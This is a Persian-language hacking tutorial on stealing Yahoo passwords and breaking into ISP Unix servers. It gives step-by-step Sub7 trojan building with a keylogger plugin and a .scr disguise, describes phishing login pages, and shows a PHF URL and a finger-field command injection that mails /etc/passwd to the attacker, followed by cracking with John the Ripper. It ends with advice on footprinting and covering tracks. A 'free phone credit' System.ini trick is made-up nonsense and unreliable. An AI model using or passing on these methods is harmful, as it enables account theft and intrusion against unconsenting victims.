هک در یاهو

خوب راستش این كار به همین راحتی كه مردم فكر میكنن نیست ولی راههای مختلفی وجود دار که من 5 تاشو میگم و هفتمی و بقیه رو میزارم برای بعد که یکم ........ :
روش ها :

********************************
1 – حدس زدنه اونه : من با یکی از هکرا صحبت می کردم گفتم بهترین روش هک چیه اون گفت بهترین روش ساده ترین روشه و شما هم می تونید پسورد ایمیل رو حدس بزنید !
********************************
2ـCrack:
یكی از راه ها Crack كردن پسورد طرف برای این كار نیاز به یه برنامه Cracker مثل Yahoo!Cracker دارین كه میتونین اونو از سایت:
http://www.yahpro.com/
download كنین
روش این برنامه به این صورت كه با امتحان كردن پسوردهای زیاد در مدت كم پسورد طرف رو برای شما پیدا كنه به صورتی كه شما یه لیست با فرمت txt در اختیارش بذارین كه پر از اعداد و كلمه ها باشه و یا این كه بصورت Random خودش انتخاب كنه
*******************************
3ـTrojan:
این روش بهتریه و درصد برای به دست آوردن پسورد خیلی بالاست و شما برای به دست آوردن هر نوع پسوردی میتونین از اون استفاده كنین(چه پسورد اینترنت و چه پسورد یاهو و Msn و ...)
۱-وارد سایت http://www.sub7.net/ بشین
۲-Enter كنین
۳ـوارد قسمت Downloads بشین
۴ـروی Old Version Downloads كلیك كنید
۵ـSub7 2.2 رو download كنین
۶ـپس از download و Setup كردن به فولدری كه برنامرو Setup كردین برین و فایل:EditServer.exe رو اجرا كنین
۷ـپس از اجرا كردن یه پنجره باز میشه و شما Run In Normal Mode(اجرا در محیط نرمال) رو انتخاب كنین
۸-به Port كاری نداشته باشین و در صورت مایل بودن برای سرور خود پسورد انتخاب كنین
۹-در منوی سمت چپ به startup methods كاری نداشته باشین و بر روی Notification كلیك كنید
۱۰-روی add e-mail notify كلیك كنید و آدرس ای میل خودتون رو وارد كنین(@ یادتون نره)
۱۱-حالا دوباره از منوی سمت چپ PlugIns رو انتخاب كنین
۱۲ـرو add binded Plugin كلیك كنین
۱۳ـاز فولدر PlugIns پلاگ این s7keys.dll رو انتخاب كنین
۱۴-روی exe icon/other كلیك كنین
۱۵-در این قسمت میتونین برای سرور خودتون آیكون و Error گمراه كننده درست كنین
۱۶-روی ...Save as كلیك كنین و سرور خودتون رو Save كنین

نكته :
۱-توجه داشته باشین كه برای Save كردن بایستی exe. رو بنویسین
۲-هرگز فایل server.exe رو اجرا نكنین همینطور سرورهایی كه خودتون ساخته اید
۳-بهتر است برای آن كه كسی به exe بودن سرور شما شك نكنه از پسوند scr. به جای exe. استفاده كنین(موقع Save كردن)
۴ـبهتر است همیشه E-mail یاهوی خودتونو بدین و Msn و Hotmail اكثرا كار نمیكنند.

Hack:
۱-پس از ساختن سرور كافیست اونو برای كسی كه مایل به Hack كردنش هستین بفرستین پس از این كه طرف فایل رو اجرا كرد به آدرس E-Mail كه دادین یه میل میاد كه Subject:Online و پس از باز كردن در اون یه شماره IP وجود داره اونو كپی كرده و سپس برنامه Sub7.exe رو اجرا كرده و در قسمت IP وارد كنین(Port هم همچنین) و بر روی Connect كلیك كنین
۲-پس از وصل شدن به كامپیوتر طرف از منوی سمت چپKeys/messeges رو انتخاب كنین
۳-سپس KeyBoard رو انتخاب كنین
۴-بعد Open KeyLogger رو باز كنین و بر روی آیكون ¤دست¤ كلیك كنین

حالا تمام كلیدهای كه طرف شما وارد میكنه قابل دیدن هستن كافیه یه بار اونو از باهو بندازین بیرون و منتظر بمانین كه دوباره LogIn كنه و پسوردشو وارد كنه
در صورتی كه این كار جواب نداد میتونین از قسمت Yahoo!Spy استفاده كنین

نكته:
برای بدست آوردن اینترنت بر روی Advanced/Passwords/Ras Passwords كلیك كنین و پس از Upload شدن پلاگ این مربوطه میتونین پسوردهای طرفو در ببارین
در صورتی كه Windows طرف XP باشه متاسفم چون امكان در آوردن پسورد وجود نداره
********************************
4 – از طریق رفتن پروفایل ! خوب قبل از این که یاهو سیستم امنیتیش رو عوض کنه پروفایل و ایمیل روی یه سرور کدبندی شده بودند و شما می تونستید با نگاه کردن به کد بندی و آدرس پروفایل و یکمی زیرکی بدون دونستن پسورد ایمیل وارد یاکس ایمیلش بشید که این روش بعد از تغیر سیستم امنیتی یاهو خیلی خیلی سخت شده و شاید هم ناممکن !
********************************
5- شبیه سازی صفحه ورود به ایمیل است که درواقع پشت اون یه پسورد سندر همه کارارو انجام می ده ! و به این شکل هست که ایتدا یه صفحه لاگین ایمیل مانند یاهو می سازید و در سایت خودتون قرار میدی و فرد با وارد شدن به این قسمت و دادن پسورد خود در واقع اونو به ایمیل شما می فرسته !

کم شدن پول تلفن و بیشتر شدن اعتبار کارت

● اول بگردین فایل System.ini رو پیدا کنید . برای این کار می تونید از در ویندوز از سرج استفاده
کنید ...
بعد اونو باز کنید و دنبال [386enh] بگردید ...
بعد این دستورات رو بهش اضافه کنید و به همین صورت سیو کنید :

Com0@00 Irq0000@0 Buffer=1024
@ number = ( 3,1,4,1,5,9)
@ letters = ( " this", " is ", "a" , "test" )
$word , $ anther - word - ) = ( " one " , "two" )
woafont=dosapp.FON

البته مطالب بالا رو که گفتم شما به خاطر فارسی بودن صفحات برعکس میبینید که اگه تو پرونده مورد نظر کپی کنید باید سمت راست باشه !
البته متن را باید در خط بعد از [386enh] تایپ کنید یعنی به این صورت
[386enh]
Com0@00 Irq0000@0 Buffer=1024
@ number = ( 3,1,4,1,5,9)
@ letters = ( " this", " is ", "a" , "test" )
$word , $ anther - word - ) = ( " one " , "two" )
woafont=dosapp.FON

یا
386enh]
Com0@00 Irq0000@0 Buffer=1024
@ number = ( 3,1,4,1,5,9)
@ letters = ( " this", " is ", "a" , "test" )
$word , $ anther - word - ) = ( " one " , "two" )
[woafont=dosapp.FON

***اینترنت مجانی***

Unixیكی از سرورهایی است كه در جهان بسیار از آن استفاده می شود در ایران و دربیشتر شهر های بزرگ هم ISPهایی وجود دارند كه سرور آن ها Unixباشند .بنابر این شما می توانید برای هك آن ها از این راه ها استفاده كنید شما در این راه احتمالا با مشكلات زیادی برخورد خواهید كرد .من راه كامل و بی عیبی را در اختیار شما نمی گذارم برای نفوذ گر شدن باید تلاش بسیاری كرد و این اشاره ای است كه شما را به طرف راه درست هدایت می كند .برای هك یونیكس از این طریق عمل می كنند كه با روش هایی كه ذكر خواهد شد فایل حاوی Passwordها و IDها را كه به نام Passwdمی باشد دریافت كنند .این فایل یك فایل متنی است كه در آن اطلاعات بصورت رمز در آمده .وقتی شما یك فایل Passwdرا باز كنید چنین نوشته هایی را می بینید .كه باید آن را از حالت رمز در آورد .
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:3A62i9qr:1012:10:Mashhad

در اینجا مثلا Tahaنام IDو 3a62...كلمه عبور اما به صورت رمز در آمده می باشد .
شاید فایل به شكل زیر هم باشد .اما این فایل كار را غیرممكن می سازد.در صورتی كه به شكل زیر باشد یعنی در آن علامت *به جای كلمه ی به رمز آمده به آن ها Shadowedگفته می شود .
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:*:1012:10:mashhad BFH:/home/user/Taha:/usr/local/bin/tcsh
ما فعلا می خواهیم این فایل را دریافت كنیم .اولین قدم این است كه آیدی در آن ISPبرای خود دست و پا كنیم .حالا این آیدی می تواند متعلق به دوستمان باشد و یا یك آشنای دور .پیدا كردن رمز دوست شما به سادگی میسر است كه در حوصله این مقاله نمی گنجد .بعد از پیدا كردن رمز شما با آیدی دوستتان به شبكه Connectشوید .این اتصال می تواند یك اتصال به طریق Modem DialUp Connectionباشد .بعد از اتصال كامل وارد قسمت MS-DOS Promptشوید و فرمان زیر را وارد كنید
FTP http://www.domain.com/
كه Domainآدرس سرور ISPمی باشد سپس از شما خواسته می شود تا آیدی خود را وارد كنید كلمه ی Anonymousرا بزنید .سپس وقتی درخواست كلمه عبور شد كلید Enterرا بزنید .اگر وارد سیستم شدید موفق شده اید در غیر این صورت جمله ی login failedدریافت می شود .دوباره امتحان كنید و این بار در كادر Passwordآدرس Emailای را وارد كنید .اگر این بار هم جواب نداد به جای كلمه ی anonymousاز Userخود یعنی دوستتان استفاده كنید . احتمال دارد این بار هم موفق نشوید .این دفعه روش های فوق را برای دستور زیر امتحان كنید
FTP ftp.domain.com
اگر این بار هم جوابی نگرفتید با ISPتماس گرفته و سوال كنید كه چگونه می توانم از سرور FTPخود شما استفاده كنم چون وارد سیتمتان نمی شود اگر پرسید برای چه می خواهید وارد شوید بگویید می خواهم از نرم افزار های آن استفاده كنم ولی مواظب باشید كه نام خود را نگویید .خلاصه تمام تلاش خود را برای فهمیدن روش دستیابی به سیستم بكنید اگر توانستید وارد سیستم شوید به راحتی می توانید وارد شاخه ی مشخصی رفته و فایل Passwdها را بگیرید ولی احتمال دارد كه آن شاخه برای شما قفل شده باشد .برای كار با FTPباید دستورات FTPرا یاد داشته باشید .برای لسیت دستورات می توانید ?را تایپ كنید .ابتدا به شاخه ی ETCبروید می توانید فایل passwdرا در آنجا پیدا كنید .این فایل را بگیرید .اگر در آنجا نبود شاخه های دیگر را امتحان كنید .ولی به احتمال زیاد همانجاست .حال اگر اصلا نتوانستید وارد FTPشوید می توانید این فایل را با استفاده از قایلبیت PHFبگیرید .به این صورت كه در Internet Browserخود آدرس زیر را وارد كنید .
http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd
اگر به این صورت هم نتوانستید آن را بگیرید می توانید از طریق Fingerاین كار را انجام دهید .این روش به شرطی جواب می دهد كه Serverمورد نظر قابلیت Fingerرا داشته باشد .به آدرس زیر مراجعه كنید .
www.domain.com/cgi-bin/finger
اگر این آدرس كار نكند دیگر هیچ امیدی نیست اما اگر كار كند كادری جلوی شما ظاهر می شود كه می خواهد نام مورد نظر خود را بدهید .آدرس زیر را وارد كنید .
ID@domain.com ; /bin/mail you@somewhere.com < etc/passwd
كه در این آدرس IDشناسه كاربری یك شخص است كه مثلا می توانید از آیدی دوستتان استفاده كنید domain.comآدرس نام حوزه ی ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا این یك نمونه است .
bfh@internet.com ; /bin/mail amir6_6_6@yahoo.com < etc/passwd
با وارد كردن این دستور فایل Passwdبرای من به آدرس 3dhack@yahoo.com پست می شود !
خوب حالا تا الان اگر توانسته اید فایل را گرفته باشید كه بهتر در غیر اینصورت باید بی خیال این روش شوید .
حالا اگر فایل shadowedگیر آوردید بقیه ی متن را نخوانید چون كمكی به شما نمی كند و باید از روش های دیگری استفاده كرد .اما اگر یك فایل مثل نمونه اولی كه در بالا بود گیر آوردید می توانید كار خود را ادامه دهید حالا شما نیاز به یك برنامه ی Unix Password Crackerدارید معروف ترین این نوع برنامه ها John Ripperو Cracker Jackمی باشد .اما John Ripper سریعترین نوع این برنامه می باشد .این دو برنامه را می توانید از همان آدرس قبلی یعنی www.hackersclub.com/km/frontpageبه دست بیاورید .با استفاده از این برنامه ها می توانید به هدف خود برسید . به همین راحتی .....

Hacker  کیست ؟

هکر کسی است که با سیستم های کامپیوتری آشناست و می‌تواند با روش‌هایی خاص (بدون اجازه) وارد آنها شود... این انسان می‌تواند خوب یا بد باشد ( در هر حال هکر است )

- سوال: یک هکر از چه راهی وارد یک سیستم می‌شود؟
از راه شبکه (نه بابا ! )
باید توجه کنید که هر سیستم کامپیوتری (به عبارت بهتر هر سیستم عامل) به هر حال محصول کار تعدادی انسان است و حتما دارای تعدادی bug (خطاهایی که بعد از ارائه محصول به بازار به تدریج کشف می‌شوند) خواهد بود. بعد از اینکه یک باگ مشخص شد، شرکت ها نرم‌افزارهایی را به‌سرعت (در عرض چند ساعت ) ایجاد می‌کنند تا مشکل رفع شود این‌ها را patch می‌گویند. و بعد مدیران شبکه (Wbemasters) در عرض چند روز تا چند سال (آین آخری در مورد ایرانه) آنها را download کرده و مشکل را حل می‌کنند. در این فاصله هکرها دمار از روزگار این سایت‌ها در می‌اورند...

- تعریف چند اصطلاح:

*** Hacker واقعی = سامورایی :
کسی که هدفش از نفوذ به سیستم‌ها نشان دادن ضعف سیستم‌های کامپیوتری است نه سوءاستفاده ...

*** Wacker (واکر):
کسی که هدفش از نفوذ به سیستم‌ها، استفاده از اطلاعات آن سیستم‌هاست (جرو هکر‌های کلاه‌ سیاه )

*** Cracker (کراکر):
کسی که هدفش از نفوذ به سیستم‌ها، خرابکاری و ایجاد اختلال در سیستم‌های کامپیوتری است. (جرو هکر‌های کلاه‌ سیاه )

*** Preaker :
از قدیمی‌ترین هکرها هستند که برای کارشان نیاز (و دسترسی) به کامپیوتر نداشتند و کارشان نفوذ به خطوط تلفن برای تماس مجانی، استراق‌سمع و ... بود. این جزو آموزش من نیست چون کار خیلی بدیه .

v زنگ ‌تفریح

- تقسیم بندی من برای هکر ها:

۱- جوجه‌هکرها (احمق کوچولوها):
توانایی‌ها: بلدند از Sub 7 , 187 استفاده کنند و فکر کنند دیگه همه‌چی رو یاد گرفته‌اند !

۲- خروس‌هکر‌ها یا مرغ‌هکرها (احمق‌های بزرگتر):
توانایی‌ها: Mail Box را هم می‌توانند Bomb کنند ... ماشاءالله !

۳- هکرهای قابل‌احترام ( مثل خود شما):
دارند یاد می‌گیرند و هنوز ۲،۳ سال کار دارند.

۴- هکرهای پیش‌کسوت:
دیگه آفتاب لبه بومه ... هکرهای قابل احترام را دوس دارند


v تقسیم‌بندی

- انواع کامپیوتر‌های شبکه:
=> کامپیوترهای Server : کامپیوترهایی که کارشان تامین اطلاعات در شبکه است، مثلآ کامپیوترهایی که سایت‌ها را نگه می‌دارند.
=> کامپبوتر‌های Client : کامپیوترهایی که استفاده کننده هستند مثل همین کامپیوتر خودتان که دارید ازش کار می‌کشید.


- انواع سیستم‌ عامل‌هایی که Server ها از آن استفاده‌ می‌کنند:

=> سیستم‌های فعلی:
* خانواده Unix (مثل FreeBSD, Linux, Sun Solaris )
* خانواده Windows (مثل WinNT, Win2000 )
* OsMac
=> سیستم‌های قدیمی (منقرض شده - آخیش ! ):
AIX, IRIS, DEC10, DEC20 , ...


- سوال: کدام‌ها را باید یاد گرفت؟
Win2000, Unix(Linux) را باید یاد بگیرید. پیشنهاد من این است که Win2000و RedHat Linux را روی کامپیوتر خود همزمان داشته باشید.


v برای شروع چه چیزی لازم است؟

۱- Win2000 , Linux را روی کامپیوتر خود نصب کرده و شروع به یادگیری کنید.
۲- شروع به یادگیری زبان C کنید.
۳- شروع به یادگیری TCP/IP کنید. (یک کتاب بخرید )
۴- مهمترین چیز علاقه به طی کردن یک مسیر بسییییییار طوووووولانی


v تقسیم‌بندی انواع حملات

Sub7 زیاد هم بد نیست ولی نباید زیاده‌روی کرد) علت هم اینه که هربار که به اینترنت وصل می‌شوند ip جدیدی به‌ آنها اختصاص پیدا می‌کنه و زحماتتون هدر می‌ره

حالا تقسیم‌بندی:
۱- حمله به روش Denial of Service Attack) DoS)
۲- حمله به روش Exploit
۳- حمله به روش Info Gathering

۴- حمله به روش Disinformation


v 133t Speak چیست؟

گاهی هکرها در هنگام نوشتن به جای تعدادی از حروف انگلیسی معادل‌های قراردادی به کار می‌روند که لیست آنها را در زیر می‌بینید:
0 <= O1 <= L; I2 <= Z3 <= E4 <= A5 <= S6 <= G7 <= T8 <= B| <= L; I@ <= at (duh)$ <= S)( <= H}{ <= H/\/ <= N\/\/ <= W/\/\ <= M|> <= P; D|< <= Kph <= fz <= s


مثلا he Speaks می‌شود:
}{3 $|>34|< z
توصیه من اینه که از این معادل‌ها تا جایی که می‌تونید استفاده نکنید. فقط یاد بگیرید که کم نیارید.


v ترسیم مسیر برای آینده

۱- اولین و مهمترین تصمیم انتخاب نوع کامپیوتری است که می‌خواهید هک کنید ( کلاینت یا سرور )، زیرا روش‌هک کردن این‌دو بجز در مراحل ابتدایی کاملا متفاوت است.
۲- دومین گام انتخاب یک کامپیوتر مشخص (مثلا کامپیوتری که فلان سایت را نگه می‌دارد که مثالی برای کامپیوتر سرور است و یا کامپیوتر فلان شخصی که با او چت می‌کنید که مثالی برای کامپیوتر کلاینت است) و جمع‌آوری اطلاعات در مورد آن است. این جمع‌آوری اطلاعات از قربانی (Victim) را Footprinting گویند. اولین مشخصه‌ای که باید کشف شود، ip اوست. یکی دیگر از اطلاعات مهم که معمولا دنبالش هستیم، پیدا کردن نوع سیستم‌عامل و نیز برنامه‌هایی است که کامپیوتر شخص از آنها بهره می‌برد. یکی از مهمترین ( و گاه خطرناک‌ترین) کارها، تست‌کردن پورت‌های آن کامپیوتر برای دیدن اینکه کدام پورت‌ها باز و کدام‌ها بسته هستند.
۳- مرحله بعدی در واقع شروع تلاش برای نفوذ به سیستم است. این نفوذ سطوح مختلف دارد و بالاترین آن که در کامپیوترهای سرور روی می‌دهد، حالتی است که بتوان username و password مربوط به مدیر کامپیوتر (administrator) یا superuser را به‌دست آورده و از طریق این Shell Account به نهایت نفوذ دست‌ یابیم ولی گاه به‌دلایل مختلف (مربوط به سطح علمی خود و ... ) نمی‌توان به این سطح دست‌یافت اما به هر حال برای مرحله بعدی می‌تواند استفاده شود. این مرحله جایی است که هنر شما یه عنوان یک هکر آغاز شده و نیز به پایان می‌رسد.
۴- این مرحله بعد از نفوذ روی می‌دهد که در آن به یک سطحی از کنترل سیستم رسیده‌اید. رفتار شما در این مرحله مشخص می‌کند که چه نوع هکر هستید(سامورایی، واکر و یا کراکر) و اینکه آیا جنبه یاد گرفتن را داشته‌اید یا نه، همینجا مشخص خواهد شد.
۵- مرحله آخر پاک کردن ردپاست تا گیر نیفتیم (البته بعضی وقتها برای کلاس گذاشتن باید گیر بیفتیم، هه هه ...). بعضی از سیستم‌ها آمار login را نگه می‌دارند که در مورد آنها این مرحله بسیار مهم است.